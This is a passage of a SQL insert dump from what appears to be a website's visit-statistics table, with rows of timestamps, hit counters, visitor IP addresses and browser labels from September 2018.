309387,1538107537,1,1,0,0,'54.36.148.212','other'),(309388,1538107539,1,1,0,0,'157.55.39.71','other'),(309389,1538107648,1,1,0,0,'54.36.148.241','other'),(309390,1538107848,1,1,0,0,'54.36.148.245','other'),(309391,1538107859,1,1,0,0,'54.36.148.80','other'),(309392,1538108076,1,1,0,0,'54.36.148.144','other'),(309393,1538108125,1,1,0,0,'54.36.149.48','other'),(309394,1538108734,1,1,0,0,'54.36.148.178','other'),(309395,1538108806,1,1,0,0,'54.36.149.24','other'),(309396,1538108929,1,1,0,0,'95.163.255.160','other'),(309397,1538108940,1,1,0,0,'95.163.255.166','other'),(309398,1538109301,1,1,0,0,'54.36.149.100','other'),(309399,1538110033,1,1,0,0,'54.36.148.206','other'),(309400,1538110484,1,1,0,0,'216.244.66.241','other'),(309401,1538110531,1,1,0,0,'66.249.64.131','chrome'),(309402,1538110878,1,1,0,0,'54.36.148.205','other'),(309403,1538110998,1,1,0,0,'8.29.198.27','other'),(309404,1538111001,1,1,0,0,'54.36.148.73','other'),(309405,1538111230,1,1,0,0,'8.29.198.25','other'),(309406,1538111637,1,1,0,0,'95.163.255.160','other'),(309407,1538111639,1,1,0,0,'95.163.255.158','other'),(309408,1538111754,1,1,0,0,'54.36.148.246','other'),(309409,1538112204,1,1,0,0,'216.244.66.241','other'),(309410,1538113048,2,2,0,0,'87.250.224.46','other'),(309411,1538113051,2,2,0,0,'141.8.142.74','other'),(309412,1538113061,1,1,0,0,'178.154.171.88','other'),(309413,1538113169,1,1,0,0,'66.249.64.137','chrome'),(309414,1538113518,1,1,0,0,'54.36.148.83','other'),(309415,1538113724,1,1,0,0,'54.36.149.96','other'),(309416,1538113725,1,1,0,0,'54.36.149.78','other'),(309417,1538113883,1,1,0,0,'91.196.177.110','chrome'),(309418,1538113938,1,1,0,0,'54.36.149.85','other'),(309419,1538114214,1,1,0,0,'54.36.148.75','other'),(309420,1538114376,11,11,0,0,'207.46.13.134','other'),(309421,1538114387,7,7,0,0,'207.46.13.226','other'),(309422,1538114394,13,13,0,0,'157.55.39.71','other'),(309423,1538114406,6,6,0,0,'157.55.39.185','other'),(309424,1538114419,1,1,0,0,'95.163.255.182','other'),(309425,1538114453,1,1,0,0,'54.36.149.105','other'),(309426,1538114534,1,1,0,0,'54.36.148.144','other'),(309427,1538114997,1,1,0,0,'54.36.149.27','other'),(309428,1538115042,1,1,0,0,'180.76.15.161','other'),(309429,1538115239,1,1,0,0,'54.36.149.20','other'),(309430,1538115245,1,1,0,0,'54.36.148.223','other'),(309431,1538115408,1,1,0,0,'54.36.148.62','other'),(309432,1538115427,2,2,0,0,'216.244.66.241','other'),(309433,1538115437,1,1,0,0,'8.29.198.26','other'),(309434,1538115523,1,1,0,0,'54.36.148.231','other'),(309435,1538115542,1,1,0,0,'54.36.148.99','other'),(309436,1538115703,1,1,0,0,'54.36.148.82','other'),(309437,1538115824,1,1,0,0,'54.36.148.36','other'),(309438,1538115873,1,1,0,0,'54.36.148.76','other'),(309439,1538116081,1,1,0,0,'54.36.149.41','other'),(309440,1538116131,1,1,0,0,'54.36.149.53','other'),(309441,1538116396,1,1,0,0,'95.163.255.172','other'),(309442,1538116461,1,1,0,0,'54.36.148.56','other'),(309443,1538116488,1,0,1,0,'66.249.64.131',''),(309444,1538116745,2,2,0,0,'46.211.137.153','chrome'),(309445,1538117012,1,1,0,0,'178.94.217.33','firefox'),(309446,1538117169,1,1,0,0,'54.36.149.25','other'),(309447,1538117215,1,1,0,0,'91.196.178.99','chrome'),(309448,1538117633,1,1,0,0,'91.196.178.169','chrome'),(309449,1538118136,1,1,0,0,'51.255.65.46','other'),(309450,1538118145,1,1,0,0,'54.36.148.83','other'),(309451,1538118252,2,2,0,0,'54.36.149.84','other'),(309452,1538118524,1,1,0,0,'49.144.132.73','firefox'),(309453,1538118570,1,1,0,0,'54.36.148.153','other'),(309454,1538118850,1,1,0,0,'54.36.148.136','other'),(309455,1538118859,1,1,0,0,'54.36.148.226','other'),(309456,1538118912,1,1,0,0,'54.36.148.213','other'),(309457,1538119249,1,0,1,0,'66.249.70.25',''),(309458,1538119659,1,1,0,0,'54.36.148.182','other'),(309459,1538119980,1,1,0,0,'54.36.149.7','other'),(309460,1538119983,1,1,0,0,'54.36.149.78','other'),(309461,1538119987,1,1,0,0,'66.249.64.131','chrome'),(309462,1538120023,1,1,0,0,'54.36.148.72','other'),(309463,1538120037,1,1,0,0,'95.163.255.191','other'),(309464,1538120039,1,1,0,0,'95.163.255.196','other'),(309465,1538120169,2,2,0,0,'216.244.66.241','other'),(309466,1538120411,1,1,0,0,'54.36.148.34','other'),(309467,1538120657,1,1,0,0,'54.36.148.223','other'),(309468,1538120883,1,1,0,0,'54.36.148.50','other'),(309469,1538120954,1,1,0,0,'95.163.255.154','other'),(309470,1538120971,1,1,0,0,'54.36.149.97','other'),(309471,1538120981,1,1,0,0,'54.36.149.62','other'),(309472,1538121013,1,1,0,0,'54.36.149.38','other'),(309473,1538121060,1,1,0,0,'54.36.148.70','other'),(309474,1538121065,1,1,0,0,'54.36.149.88','other'),(309475,1538121173,1,1,0,0,'54.36.148.101','other'),(309476,1538121734,1,1,0,0,'54.36.148.150','other'),(309477,1538121843,1,1,0,0,'8.29.198.25','other'),(309478,1538121910,1,1,0,0,'54.36.148.100','other'),(309479,1538121924,1,1,0,0,'54.36.148.18','other'),(309480,1538121952,1,1,0,0,'31.43.31.17','chrome'),(309481,1538121995,8,8,0,0,'5.9.77.102','other'),(309482,1538122026,1,1,0,0,'66.249.64.135','chrome'),(309483,1538122053,1,1,0,0,'8.29.198.27','other'),(309484,1538122463,1,1,0,0,'54.36.148.81','other'),(309485,1538122500,1,1,0,0,'95.163.255.167','other'),(309486,1538123226,1,1,0,0,'54.36.149.23','other'),(309487,1538123278,1,1,0,0,'54.36.148.153','other'),(309488,1538123300,1,1,0,0,'54.36.148.149','other'),(309489,1538123321,1,1,0,0,'54.36.148.205','other'),(309490,1538123684,1,1,0,0,'54.36.149.15','other'),(309491,1538123763,1,1,0,0,'54.36.148.31','other'),(309492,1538123799,1,1,0,0,'54.36.149.55','other'),(309493,1538123915,2,2,0,0,'66.249.64.135','chrome'),(309494,1538123962,1,1,0,0,'54.36.148.109','other'),(309495,1538124093,1,1,0,0,'54.36.148.219','other'),(309496,1538124729,1,1,0,0,'54.36.148.66','other'),(309497,1538124932,1,1,0,0,'54.36.148.98','other'),(309498,1538125035,2,2,0,0,'91.196.178.135','chrome'),(309499,1538125227,1,1,0,0,'54.36.148.229','other'),(309500,1538125272,1,1,0,0,'54.36.148.190','other'),(309501,1538125283,1,1,0,0,'54.36.149.42','other'),(309502,1538125402,1,1,0,0,'216.244.66.241','other'),(309503,1538125464,1,1,0,0,'54.36.149.36','other'),(309504,1538125490,1,1,0,0,'54.36.148.155','other'),(309505,1538125885,1,1,0,0,'157.55.39.185','other'),(309506,1538125924,1,1,0,0,'91.196.178.79','chrome'),(309507,1538126046,1,1,0,0,'34.217.121.224','chrome'),(309508,1538126247,1,1,0,0,'39.104.226.239','other'),(309509,1538126267,1,1,0,0,'8.29.198.26','other'),(309510,1538126386,1,1,0,0,'207.46.13.226','other'),(309511,1538126564,1,1,0,0,'54.36.148.161','other'),(309512,1538126767,1,1,0,0,'54.36.149.103','other'),(309513,1538126824,1,1,0,0,'216.244.66.241','other'),(309514,1538127204,1,1,0,0,'54.36.148.221','other'),(309515,1538127220,1,1,0,0,'54.36.148.190','other'),(309516,1538127470,1,1,0,0,'54.36.149.56','other'),(309517,1538127698,1,1,0,0,'54.36.149.78','other'),(309518,1538128015,1,1,0,0,'54.36.148.59','other'),(309519,1538128050,1,1,0,0,'95.163.255.174','other'),(309520,1538128306,1,1,0,0,'91.196.178.94','chrome'),(309521,1538128477,1,1,0,0,'39.104.226.239','other'),(309522,1538128612,1,1,0,0,'185.36.196.7','firefox'),(309523,1538128640,1,1,0,0,'54.36.149.56','other'),(309524,1538128662,1,1,0,0,'54.36.148.51','other'),(309525,1538128694,2,2,0,0,'54.36.148.198','other'),(309526,1538128741,1,1,0,0,'54.36.148.134','other'),(309527,1538128766,1,1,0,0,'54.36.149.6','other'),(309528,1538129103,1,1,0,0,'95.135.219.152','chrome'),(309529,1538129120,1,1,0,0,'54.36.148.173','other'),(309530,1538129193,2,2,0,0,'36.248.171.249','chrome'),(309531,1538129241,1,1,0,0,'37.53.227.156','firefox'),(309532,1538129373,1,1,0,0,'54.36.149.62','other'),(309533,1538129474,1,1,0,0,'54.36.148.207','other'),(309534,1538129486,1,1,0,0,'54.36.148.233','other'),(309535,1538129580,1,1,0,0,'54.36.148.116','other'),(309536,1538129587,1,1,0,0,'54.36.149.18','other'),(309537,1538129624,1,1,0,0,'54.36.148.231','other'),(309538,1538129627,1,1,0,0,'54.36.149.5','other'),(309539,1538129802,1,1,0,0,'107.21.1.8','other'),(309540,1538129804,1,1,0,0,'54.208.102.37','other'),(309541,1538130237,2,2,0,0,'216.244.66.241','other'),(309542,1538130291,1,1,0,0,'54.36.149.100','other'),(309543,1538130601,1,1,0,0,'54.36.148.26','other'),(309544,1538130731,1,1,0,0,'54.36.148.43','other'),(309545,1538130964,1,1,0,0,'54.36.148.220','other'),(309546,1538130992,1,1,0,0,'66.249.64.137','chrome'),(309547,1538131142,1,1,0,0,'54.36.148.229','other'),(309548,1538131409,1,1,0,0,'54.36.148.117','other'),(309549,1538131557,1,1,0,0,'54.36.148.201','other'),(309550,1538132012,1,1,0,0,'95.163.255.150','other'),(309551,1538132238,1,1,0,0,'91.196.178.41','chrome'),(309552,1538132298,1,1,0,0,'95.163.255.168','other'),(309553,1538132366,1,1,0,0,'54.36.148.145','other'),(309554,1538132483,1,1,0,0,'216.244.66.241','other'),(309555,1538132683,1,1,0,0,'8.29.198.25','other'),(309556,1538132873,1,1,0,0,'8.29.198.26','other'),(309557,1538132913,1,1,0,0,'95.163.255.190','other'),(309558,1538132966,1,1,0,0,'95.163.255.178','other'),(309559,1538133051,1,1,0,0,'54.36.148.155','other'),(309560,1538133199,1,1,0,0,'54.36.148.245','other'),(309561,1538133222,1,1,0,0,'54.36.148.168','other'),(309562,1538133243,1,0,1,0,'66.249.64.131',''),(309563,1538133394,2,2,0,0,'216.244.66.241','other'),(309564,1538133500,1,1,0,0,'54.36.148.87','other'),(309565,1538133549,1,1,0,0,'180.76.15.148','other'),(309566,1538133641,1,1,0,0,'95.163.255.197','other'),(309567,1538133655,1,1,0,0,'54.36.148.211','other'),(309568,1538133709,1,1,0,0,'54.36.148.35','other'),(309569,1538133810,1,1,0,0,'95.163.255.182','other'),(309570,1538133817,1,1,0,0,'95.163.255.181','other'),(309571,1538133951,1,1,0,0,'66.249.70.27','chrome'),(309572,1538134549,1,1,0,0,'54.36.148.144','other'),(309573,1538134827,1,1,0,0,'54.36.148.173','other'),(309574,1538135255,1,1,0,0,'54.36.148.158','other'),(309575,1538135536,1,1,0,0,'54.36.148.20','other'),(309576,1538135824,1,1,0,0,'95.135.83.36','chrome'),(309577,1538135934,1,1,0,0,'66.249.64.137','chrome'),(309578,1538136005,2,2,0,0,'37.9.113.115','other'),(309579,1538136111,3,3,0,0,'178.154.171.88','other'),(309580,1538136133,1,1,0,0,'37.9.113.182','other'),(309581,1538136179,2,2,0,0,'178.154.244.62','other'),(309582,1538136261,1,1,0,0,'54.36.148.106','other'),(309583,1538136608,6,6,0,0,'141.8.142.74','other'),(309584,1538136698,1,1,0,0,'54.36.149.40','other'),(309585,1538136898,1,1,0,0,'54.36.148.121','other'),(309586,1538137050,1,1,0,0,'178.154.171.88','other'),(309587,1538137110,1,1,0,0,'8.29.198.25','other'),(309588,1538137408,1,1,0,0,'66.249.70.27','chrome'),(309589,1538137679,3,3,0,0,'141.8.142.74','other'),(309590,1538137683,1,1,0,0,'178.154.244.24','other'),(309591,1538137801,1,1,0,0,'54.36.149.34','other'),(309592,1538137847,2,2,0,0,'66.249.64.135','chrome'),(309593,1538137875,1,1,0,0,'54.36.149.82','other'),(309594,1538137885,1,1,0,0,'54.36.149.55','other'),(309595,1538137887,1,1,0,0,'66.249.64.131','chrome'),(309596,1538137971,1,0,1,0,'66.249.64.137',''),(309597,1538138031,1,1,0,0,'54.36.148.40','other'),(309598,1538138104,1,1,0,0,'213.180.203.8','other'),(309599,1538138447,1,1,0,0,'178.154.244.62','other'),(309600,1538138504,1,1,0,0,'95.163.255.176','other'),(309601,1538138585,1,1,0,0,'54.36.148.192','other'),(309602,1538138625,1,1,0,0,'54.36.149.39','other'),(309603,1538138627,8,8,0,0,'141.8.142.74','other'),(309604,1538138645,6,6,0,0,'178.154.171.88','other'),(309605,1538138745,1,1,0,0,'87.250.224.46','other'),(309606,1538138790,1,1,0,0,'66.249.70.25','chrome'),(309607,1538138970,1,1,0,0,'54.36.148.133','other'),(309608,1538139114,1,0,1,0,'66.249.64.137',''),(309609,1538139161,1,1,0,0,'54.36.148.198','other'),(309610,1538139480,1,1,0,0,'54.36.148.234','other'),(309611,1538139541,4,4,0,0,'141.8.142.74','other'),(309612,1538139570,1,1,0,0,'54.36.149.39','other'),(309613,1538139624,4,4,0,0,'178.154.171.88','other'),(309614,1538139770,1,1,0,0,'95.163.255.95','other'),(309615,1538139775,2,2,0,0,'54.36.149.100','other'),(309616,1538139840,1,1,0,0,'178.154.244.62','other'),(309617,1538139873,1,1,0,0,'54.36.148.15','other'),(309618,1538139877,1,1,0,0,'54.36.148.219','other'),(309619,1538139909,1,1,0,0,'54.36.148.134','other'),(309620,1538139972,1,1,0,0,'54.36.149.28','other'),(309621,1538140077,1,1,0,0,'54.36.148.165','other'),(309622,1538140146,1,1,0,0,'54.36.148.74','other'),(309623,1538140185,1,1,0,0,'54.36.148.192','other'),(309624,1538140332,1,1,0,0,'130.180.218.51','chrome'),(309625,1538140566,1,1,0,0,'54.36.148.132','other'),(309626,1538140666,2,2,0,0,'178.154.171.88','other'),(309627,1538140705,1,1,0,0,'66.249.64.137','chrome'),(309628,1538140810,5,5,0,0,'141.8.142.74','other'),(309629,1538141118,1,1,0,0,'54.36.148.93','other'),(309630,1538141214,2,2,0,0,'46.30.166.126','chrome'),(309631,1538141244,1,1,0,0,'54.36.148.114','other'),(309632,1538141682,2,2,0,0,'54.36.148.105','other'),(309633,1538141744,3,3,0,0,'178.154.171.88','other'),(309634,1538141816,1,1,0,0,'54.36.148.241','other'),(309635,1538141848,1,1,0,0,'54.36.148.248','other'),(309636,1538141913,1,1,0,0,'54.36.148.62','other'),(309637,1538142065,7,7,0,0,'141.8.142.74','other'),(309638,1538142072,1,1,0,0,'54.36.149.21','other'),(309639,1538142255,1,1,0,0,'178.150.244.162','chrome'),(309640,1538142378,1,1,0,0,'180.76.15.14','other'),(309641,1538142522,1,1,0,0,'87.250.224.46','other'),(309642,1538142743,1,1,0,0,'178.154.244.34','other'),(309643,1538142785,1,1,0,0,'54.36.148.175','other'),(309644,1538142851,1,1,0,0,'54.36.148.181','other'),(309645,1538142948,1,1,0,0,'46.42.132.63','chrome'),(309646,1538143302,1,1,0,0,'54.36.148.20','other'),(309647,1538143353,3,3,0,0,'5.9.66.153','other'),(309648,1538143362,1,1,0,0,'216.244.66.241','other'),(309649,1538143520,1,1,0,0,'8.29.198.26','other'),(309650,1538143694,1,1,0,0,'8.29.198.25','other'),(309651,1538144155,1,1,0,0,'54.36.148.50','other'),(309652,1538144286,1,1,0,0,'54.36.148.189','other'),(309653,1538144564,1,1,0,0,'95.163.255.175','other'),(309654,1538144573,1,1,0,0,'54.36.149.55','other'),(309655,1538144605,1,1,0,0,'54.36.149.103','other'),(309656,1538144634,1,1,0,0,'54.36.149.10','other'),(309657,1538144975,1,1,0,0,'82.145.209.144','other'),(309658,1538145026,1,1,0,0,'54.36.149.75','other'),(309659,1538145056,1,1,0,0,'54.36.148.21','other'),(309660,1538145068,1,1,0,0,'54.36.148.192','other'),(309661,1538145085,1,1,0,0,'91.196.178.170','chrome'),(309662,1538145091,1,1,0,0,'157.55.39.185','other'),(309663,1538145159,1,1,0,0,'54.36.148.209','other'),(309664,1538145245,1,1,0,0,'54.36.148.78','other'),(309665,1538145275,1,1,0,0,'54.36.148.216','other'),(309666,1538145403,1,1,0,0,'92.113.189.235','chrome'),(309667,1538145449,1,1,0,0,'178.154.171.88','other'),(309668,1538145508,3,3,0,0,'216.244.66.241','other'),(309669,1538145717,1,1,0,0,'54.36.149.48','other'),(309670,1538145873,1,1,0,0,'54.36.148.93','other'),(309671,1538145890,1,1,0,0,'54.36.148.138','other'),(309672,1538146085,1,1,0,0,'54.36.148.115','other'),(309673,1538146109,1,1,0,0,'54.36.148.130','other'),(309674,1538146172,1,1,0,0,'54.36.148.118','other'),(309675,1538146185,1,1,0,0,'54.36.148.183','other'),(309676,1538146257,1,1,0,0,'82.145.208.113','other'),(309677,1538146369,1,1,0,0,'157.55.39.185','other'),(309678,1538146640,1,1,0,0,'77.111.244.4','chrome'),(309679,1538146837,1,1,0,0,'54.36.149.38','other'),(309680,1538146846,1,1,0,0,'54.36.148.96','other'),(309681,1538147034,1,1,0,0,'54.36.148.133','other'),(309682,1538147083,1,1,0,0,'54.36.149.79','other'),(309683,1538147286,1,1,0,0,'54.36.149.82','other'),(309684,1538147424,1,1,0,0,'54.36.148.201','other'),(309685,1538147728,1,1,0,0,'66.249.64.137','chrome'),(309686,1538147903,2,2,0,0,'54.36.148.132','other'),(309687,1538147927,1,1,0,0,'54.36.149.83','other'),(309688,1538147937,1,1,0,0,'8.29.198.26','other'),(309689,1538147963,1,1,0,0,'54.36.148.255','other'),(309690,1538148066,1,1,0,0,'54.36.149.47','other'),(309691,1538148449,1,1,0,0,'54.36.148.203','other'),(309692,1538148466,1,1,0,0,'54.36.148.66','other'),(309693,1538148494,1,1,0,0,'141.8.142.74','other'),(309694,1538148622,1,1,0,0,'95.163.255.173','other'),(309695,1538148801,1,1,0,0,'54.36.148.181','other'),(309696,1538149122,1,1,0,0,'54.36.149.57','other'),(309697,1538149166,1,1,0,0,'54.36.148.163','other'),(309698,1538149346,1,1,0,0,'54.36.148.94','other'),(309699,1538150108,1,1,0,0,'82.145.208.154','other'),(309700,1538150229,1,1,0,0,'54.36.148.137','other'),(309701,1538150233,1,1,0,0,'95.163.255.159','other'),(309702,1538150325,1,1,0,0,'31.13.115.9','other'),(309703,1538150329,1,1,0,0,'31.13.115.6','other'),(309704,1538150330,1,1,0,0,'31.13.127.8','other'),(309705,1538150366,1,1,0,0,'173.252.87.5','other'),(309706,1538150419,1,1,0,0,'54.36.149.9','other'),(309707,1538150431,1,1,0,0,'54.36.148.211','other'),(309708,1538150443,2,2,0,0,'46.133.68.78','chrome'),(309709,1538150510,1,1,0,0,'54.36.149.96','other'),(309710,1538150538,1,1,0,0,'46.133.238.79','chrome'),(309711,1538150540,1,1,0,0,'54.36.149.45','other'),(309712,1538150891,1,1,0,0,'54.36.148.162','other'),(309713,1538151047,1,1,0,0,'54.36.149.85','other'),(309714,1538151106,3,3,0,0,'216.244.66.241','other'),(309715,1538151144,1,1,0,0,'54.36.148.14','other'),(309716,1538151455,1,1,0,0,'66.249.70.29','chrome'),(309717,1538151544,1,1,0,0,'54.36.148.177','other'),(309718,1538151646,1,1,0,0,'54.36.148.137','other'),(309719,1538151719,1,1,0,0,'54.36.148.116','other'),(309720,1538151794,1,1,0,0,'54.36.148.45','other'),(309721,1538151847,1,1,0,0,'54.36.149.89','other'),(309722,1538152006,1,1,0,0,'54.36.148.190','other'),(309723,1538152421,1,1,0,0,'54.36.149.80','other'),(309724,1538152668,1,1,0,0,'54.36.149.107','other'),(309725,1538153316,1,1,0,0,'54.36.149.60','other'),(309726,1538153885,1,1,0,0,'54.36.149.94','other'),(309727,1538153991,1,1,0,0,'54.36.148.81','other'),(309728,1538154063,1,1,0,0,'216.244.66.241','other'),(309729,1538154103,1,1,0,0,'95.163.255.155','other'),(309730,1538154168,1,1,0,0,'92.113.189.235','chrome'),(309731,1538154355,1,1,0,0,'8.29.198.27','other'),(309732,1538154511,1,1,0,0,'8.29.198.25','other'),(309733,1538154560,1,1,0,0,'54.36.148.61','other'),(309734,1538155095,1,1,0,0,'54.36.149.9','other'),(309735,1538155401,1,1,0,0,'54.36.148.241','other'),(309736,1538155925,1,1,0,0,'54.36.148.191','other'),(309737,1538155957,1,1,0,0,'54.36.149.97','other'),(309738,1538156128,1,1,0,0,'54.36.149.78','other'),(309739,1538156301,2,2,0,0,'91.196.178.135','chrome'),(309740,1538156641,1,1,0,0,'95.163.255.173','other'),(309741,1538156785,1,1,0,0,'54.36.148.66','other'),(309742,1538156954,1,1,0,0,'54.36.149.56','other'),(309743,1538157240,1,1,0,0,'54.36.148.183','other'),(309744,1538157301,1,1,0,0,'54.36.148.31','other'),(309745,1538157305,1,1,0,0,'54.36.148.22','other'),(309746,1538157619,1,1,0,0,'54.36.148.26','other'),(309747,1538157746,1,1,0,0,'54.36.149.20','other'),(309748,1538157761,1,1,0,0,'54.36.148.230','other'),(309749,1538157774,1,1,0,0,'54.36.148.63','other'),(309750,1538157795,1,1,0,0,'93.73.173.105','chrome'),(309751,1538158002,1,1,0,0,'54.36.148.117','other'),(309752,1538158083,1,1,0,0,'66.102.9.35','chrome'),(309753,1538158198,1,1,0,0,'54.36.148.16','other'),(309754,1538158333,1,1,0,0,'54.36.148.187','other'),(309755,1538158541,1,1,0,0,'92.113.189.235','chrome'),(309756,1538158765,1,1,0,0,'8.29.198.25','other'),(309757,1538158786,1,1,0,0,'54.36.148.249','other'),(309758,1538159101,1,1,0,0,'54.36.148.132','other'),(309759,1538159197,1,1,0,0,'54.36.148.162','other'),(309760,1538159730,1,1,0,0,'95.163.255.157','other'),(309761,1538160058,1,1,0,0,'95.163.255.171','other'),(309762,1538160181,1,1,0,0,'95.163.255.95','other'),(309763,1538160606,1,1,0,0,'54.36.148.250','other'),(309764,1538160970,1,1,0,0,'54.36.149.104','other'),(309765,1538161202,1,1,0,0,'157.55.39.185','other'),(309766,1538161405,1,1,0,0,'54.36.148.170','other'),(309767,1538161718,1,1,0,0,'180.76.15.144','other'),(309768,1538162151,1,1,0,0,'95.163.255.177','other'),(309769,1538162260,1,1,0,0,'95.163.255.97','other'),(309770,1538162476,1,1,0,0,'95.163.255.193','other'),(309771,1538162541,1,1,0,0,'54.36.148.107','other'),(309772,1538162678,1,1,0,0,'54.36.148.240','other'),(309773,1538162898,1,1,0,0,'54.36.149.18','other'),(309774,1538163382,1,1,0,0,'54.36.149.98','other'),(309775,1538163399,1,1,0,0,'54.36.148.60','other'),(309776,1538163496,1,1,0,0,'54.36.148.42','other'),(309777,1538163670,1,1,0,0,'54.36.149.6','other'),(309778,1538163710,1,1,0,0,'54.36.149.26','other'),(309779,1538163854,1,1,0,0,'54.36.148.161','other'),(309780,1538164349,1,1,0,0,'216.244.66.241','other'),(309781,1538164367,1,1,0,0,'54.36.148.15','other'),(309782,1538164573,1,1,0,0,'54.36.149.102','other'),(309783,1538164784,1,1,0,0,'54.36.148.125','other'),(309784,1538164829,1,1,0,0,'54.36.148.123','other'),(309785,1538165190,2,2,0,0,'8.29.198.26','other'),(309786,1538165815,1,1,0,0,'54.36.148.12','other'),(309787,1538166035,1,1,0,0,'54.36.148.141','other'),(309788,1538166088,1,1,0,0,'54.36.148.119','other'),(309789,1538166529,1,1,0,0,'54.36.149.50','other'),(309790,1538166698,1,1,0,0,'180.76.15.149','other'),(309791,1538167100,1,1,0,0,'54.36.148.59','other'),(309792,1538167102,1,1,0,0,'54.36.148.243','other'),(309793,1538167284,1,1,0,0,'54.36.148.211','other'),(309794,1538167462,1,1,0,0,'54.36.149.38','other'),(309795,1538167536,1,1,0,0,'95.163.255.193','other'),(309796,1538167662,1,1,0,0,'207.46.13.134','other'),(309797,1538167812,1,1,0,0,'54.36.148.145','other'),(309798,1538167825,1,1,0,0,'95.163.255.179','other'),(309799,1538168852,1,1,0,0,'178.154.171.88','other'),(309800,1538168871,1,1,0,0,'54.36.148.113','other'),(309801,1538168961,1,1,0,0,'54.36.148.67','other'),(309802,1538169144,1,1,0,0,'54.36.149.71','other'),(309804,1538169160,1,1,0,0,'95.163.255.96','other'),(309805,1538169587,1,1,0,0,'54.36.149.86','other'),(309806,1538169588,1,1,0,0,'54.36.148.153','other'),(309807,1538169603,1,1,0,0,'8.29.198.25','other'),(309808,1538169668,1,1,0,0,'216.244.66.241','other'),(309809,1538169788,1,1,0,0,'54.36.148.182','other'),(309810,1538169970,1,1,0,0,'54.36.148.75','other'),(309811,1538169990,1,1,0,0,'54.36.149.104','other'),(309812,1538170364,1,1,0,0,'54.36.148.41','other'),(309813,1538171087,1,1,0,0,'95.163.255.158','other'),(309814,1538171089,1,1,0,0,'95.163.255.167','other'),(309815,1538171233,1,1,0,0,'54.36.148.229','other'),(309816,1538171876,1,1,0,0,'54.36.148.253','other'),(309817,1538171936,1,1,0,0,'54.36.148.219','other'),(309818,1538172433,1,1,0,0,'157.55.39.71','other'),(309819,1538172878,1,1,0,0,'54.36.148.70','other'),(309820,1538173288,1,1,0,0,'54.36.148.62','other'),(309821,1538173413,1,1,0,0,'54.36.149.92','other'),(309822,1538173474,1,1,0,0,'95.163.255.167','other'),(309823,1538173545,1,1,0,0,'95.163.255.171','other'),(309824,1538173742,2,2,0,0,'141.8.142.74','other'),(309825,1538173769,1,1,0,0,'54.36.148.113','other'),(309826,1538173882,1,1,0,0,'178.154.244.62','other'),(309827,1538173936,1,1,0,0,'54.36.149.0','other'),(309828,1538174007,2,2,0,0,'178.154.171.88','other'),(309829,1538174311,1,1,0,0,'54.36.148.236','other'),(309830,1538174456,1,1,0,0,'54.36.149.24','other'),(309831,1538174547,1,1,0,0,'54.36.148.189','other'),(309832,1538174842,1,1,0,0,'141.8.142.74','other'),(309833,1538174912,1,1,0,0,'95.163.255.92','other'),(309834,1538175212,1,1,0,0,'95.163.255.171','other'),(309835,1538175331,1,1,0,0,'176.31.208.193','other'),(309836,1538175395,1,1,0,0,'157.55.39.185','other'),(309837,1538175472,1,1,0,0,'54.36.149.39','other'),(309838,1538175498,1,1,0,0,'54.36.148.105','other'),(309839,1538176023,1,1,0,0,'8.29.198.26','other'),(309840,1538176159,1,1,0,0,'8.29.198.27','other'),(309841,1538176427,1,1,0,0,'54.36.148.186','other'),(309842,1538176678,1,1,0,0,'54.36.148.12','other'),(309843,1538176682,1,1,0,0,'54.36.148.73','other'),(309844,1538176871,1,1,0,0,'54.36.148.131','other'),(309845,1538176977,1,1,0,0,'54.36.148.123','other'),(309846,1538177539,1,1,0,0,'54.36.148.120','other'),(309847,1538177966,1,1,0,0,'54.36.148.131','other'),(309848,1538178039,1,1,0,0,'54.36.148.229','other'),(309849,1538178174,1,1,0,0,'54.36.148.123','other'),(309850,1538178181,1,1,0,0,'54.36.149.11','other'),(309851,1538178323,1,1,0,0,'141.8.142.74','other'),(309852,1538178372,1,1,0,0,'176.36.126.71','chrome'),(309853,1538178385,11,11,0,0,'157.55.39.185','other'),(309854,1538179216,1,1,0,0,'95.163.255.150','other'),(309855,1538179375,1,1,0,0,'54.36.148.177','other'),(309856,1538179592,1,1,0,0,'54.36.148.110','other'),(309857,1538180268,1,1,0,0,'54.36.148.117','other'),(309858,1538180435,1,1,0,0,'8.29.198.27','other'),(309859,1538180462,1,1,0,0,'54.36.148.90','other'),(309860,1538180490,1,1,0,0,'54.36.149.24','other'),(309861,1538180699,1,1,0,0,'95.163.255.169','other'),(309862,1538181017,1,1,0,0,'54.36.149.107','other'),(309863,1538181077,1,1,0,0,'54.36.148.93','other'),(309864,1538181207,1,1,0,0,'54.36.148.227','other'),(309865,1538181476,1,1,0,0,'54.36.148.78','other'),(309866,1538181897,1,1,0,0,'54.36.149.90','other'),(309867,1538182062,1,1,0,0,'95.163.255.195','other'),(309868,1538182122,1,1,0,0,'54.36.148.214','other'),(309869,1538182618,1,1,0,0,'54.36.149.93','other'),(309870,1538182883,1,1,0,0,'54.36.148.186','other'),(309871,1538183248,1,1,0,0,'54.36.148.164','other'),(309872,1538183658,1,1,0,0,'54.36.149.82','other'),(309873,1538183715,3,3,0,0,'157.55.39.71','other'),(309874,1538183719,1,1,0,0,'216.244.66.241','other'),(309875,1538183936,1,1,0,0,'54.36.148.232','other'),(309876,1538184928,1,1,0,0,'54.36.149.77','other'),(309877,1538184997,1,1,0,0,'54.36.148.21','other'),(309878,1538185007,1,1,0,0,'54.36.149.25','other'),(309879,1538185452,1,1,0,0,'54.36.149.2','other'),(309880,1538186021,1,1,0,0,'54.36.149.50','other'),(309881,1538186608,1,1,0,0,'54.36.148.69','other'),(309882,1538186749,1,1,0,0,'80.252.153.33','firefox'),(309883,1538186756,1,1,0,0,'54.36.149.52','other'),(309884,1538186861,1,1,0,0,'8.29.198.25','other'),(309885,1538186929,6,6,0,0,'207.46.13.134','other'),(309886,1538186931,1,1,0,0,'54.36.148.55','other'),(309887,1538186982,1,1,0,0,'8.29.198.26','other'),(309888,1538187077,1,1,0,0,'54.36.148.214','other'),(309889,1538187473,1,1,0,0,'66.249.64.137','chrome'),(309890,1538187580,1,1,0,0,'54.36.148.168','other'),(309891,1538187596,1,1,0,0,'95.163.255.178','other'),(309892,1538187769,1,1,0,0,'54.36.148.66','other'),(309893,1538188021,1,1,0,0,'91.196.121.15','chrome'),(309894,1538189015,1,1,0,0,'157.55.39.71','other'),(309895,1538189606,1,1,0,0,'54.36.148.215','other'),(309896,1538189669,1,1,0,0,'54.36.148.91','other'),(309897,1538189756,1,1,0,0,'54.36.149.105','other'),(309898,1538189811,1,1,0,0,'216.244.66.241','other'),(309899,1538190196,1,1,0,0,'54.36.149.76','other'),(309900,1538190236,1,1,0,0,'207.46.13.81','other'),(309901,1538190312,1,1,0,0,'95.163.255.168','other'),